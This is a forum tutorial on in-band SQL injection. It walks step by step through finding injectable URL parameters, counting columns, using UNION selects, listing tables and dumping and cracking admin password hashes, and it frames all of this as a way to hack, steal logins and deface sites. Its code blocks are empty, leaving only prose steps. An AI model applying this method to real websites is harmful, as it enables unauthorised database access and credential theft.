Okay, let me get this part out of the way...
You are you, and you know what is legal and illegal. I am creating this post for information purposes only. Any actions brought forth by the information held within this post, is purely the fault of the user, and not mine.

Now to the good junk...
How to hack a webiste? How to dump a database? How to steal logins? How to deface a site?

Well, the answer to all those questions can be solved with SQLi
In this post I will not be talking about how SQL works, that is something you need to/should want to go do on your own spare time. I will however be covering some basic how to's on SQLi.

First, I want to explain in a very simple manner on how the SQLi is working. Imagine a site that displays information from a database using a code such as:
CODE :


When you insert say a tic mark ', and other commands, this may trick the query into doing something undesired. So let's say we use ' or '1'='1, the command would be processed like so:

CODE :


This will tell the db to dump all the details inside db_posts, instead of just the desired post_id.

There are three classes in which SQLi can be grouped into:

1.) Inband - Data is extracted using the same channel that is used to inject the SQL code and the data is presented directly in the application web page.

2.) Out of Band - Data is retrieved using a different channel i.e. an e-mail

3.) Inferential - There is no actual transfer of data. You can create true and false statements to the server, and observe the behaviour of the website/DB Server to determine if the query is true.


In this how to, I will be covering Inband SQLi. (I will cover blind/Inferential in another post in the future)
(For the remander of this tutorial I will be using "http://ninjex/page.asp?id=1" as an example of a vuln site)

Next up I want to make four things clear in which you really need to know when performing a SQLi attack. That is the differences between:


1.) Error - You ask the Database a question, and look for useful information that it may send back.
CODE :

The database may send back something like:
Syntax error converting the nvarchar value '[Ninjected]' to a column of data type int.

2.) Union - Union is used to add two or more select SQL statements into one result.

3.) Blind - Asking the DB a true/false question while watching how the page reacts to the question. You may send time questions to the server such as telling it:
If the table name is 2 characters in length, respond in 5 seconds -- If you get an immediate response, you know it is false. You do this as many times needed to determine your table/column names, etc..

4.)' - The single quote, also refered to as a tick, is used to test for an SQLi vuln. This is usually appended to the end of a URL.

For a website to be vulnerable via SQLi from the URL, it usually (has get parameters) looks similar to:
http://ninjex/page.asp?id=1
http://ninjex/page.php?user=1
http://ninjex/news.php?id=853
etc

As you can see, you are really just looking for "?something=value" where something is an extension, and value is a number/string value.
To test the URL for an SQLi vuln, we need to use our tick as desribed above such as:
CODE :


Now, there are a few things which could happen at this point:

1.) SQLi Error - The website will display the SQL error straight to the webpage screen you are viewing.

2.) Page Redirect - The website will redirect you to another web page.

3.) Nothing Just like it says, nothing may happen at all.


Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is to figure out the amount of columns that are associated. To do this, we use a code similar to the following:
CODE :

The code above basically asks the Database if it has 1 table, if it does, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep going until you get an error, i.e:

CODE :
(No error)
CODE :
(Error -- You know know that it has at least 1, but less than 10 tables)
CODE :
(Error -- You know know it has at least 1, but less than 5 tables)
CODE :
(No error -- You know it has 4 tables, since 5 produced an error, and 4 did not)

So next, we need to figure out which columns are vulnerable for us to exploit, to do this we need to remember the total number of columns, as well as use our union statement in a syntax like so:
CODE :

or (I tend to always turn the value after = to null. This makes it easier to read the vuln columns, and sometimes it will not produce on the screen the vuln columns with a non null value)
CODE :


This will output some numbers onto the web page. These numbers can be anywhere, but keep note of one of them once you find it. Let's hypothetically say that I ran:
CODE :

and it showed up the numbers 2 and 4 on my web page. Either one of those columns is exploitable. So next, we need to go ahead and grab the version of the DB (I will only cover how to exploit 5.0+ Databases due to it's much more simplistic nature) To do this, we need to use the command @@version on the vuln table like so:
CODE :

This should give us the version number where the number 2 was previously at on our screen. If it is 5.0+, we can continue, if it is 4.0- I suggest moving to another site, as it is much harder yet not impossible to exploit.

So next, we need to figure out the names of our tables, to do this we will use group_concat() on the vuln column, as well as a few other commands to grab information from. The syntax will look like the following:
CODE :


Now let's hypothetically say that on the screen, where the number 2 used to be, now shows our list of tables with the names of: admin, user, login, email

So next we need to choose which table we want to exploit. In most cases, we would want either the admin or the login. So let's exploit the admin table, and find out what columns are inside of it.
Here, we will be using hex encoding for the table name here. We need our table name converted to hex, to do this use either software (I use hackbar addon for firefox) or use a website such as: http://encodertool.com/hexadecimal
Now, we see that admin converted to hex is "61646d696e", we just need to add a 0x to the front of that now to use it, so "0x61646d696e" Will be what we use for the table name.
Also, as a side note, we will also be using "0x3a" which is hex for a semicolon ":" this will be used to separate the dump from the columns later on.

So, now onto the good stuff of getting our column names inside of our admin table. To do that we use the following syntax:
CODE :


Now let's hypothetically say the columns inside the admin table are: username, password, and id. We would at this point want to dump the details from inside the username and password column, so we use the following syntax to do so:
CODE :


Let's now say that it hypothetically printed out: "Ninjex:e00cf25ad42683b3df678c61f42c6bda"
Usually the password is in MD5 format, so after finding the original value of the hash above, we see the password is "admin1"

Lastly, you can crawl the website or use an admin page finder such as this site to try and figure out where to login with the admin credentials.

Enjoy,
- -Ninjex-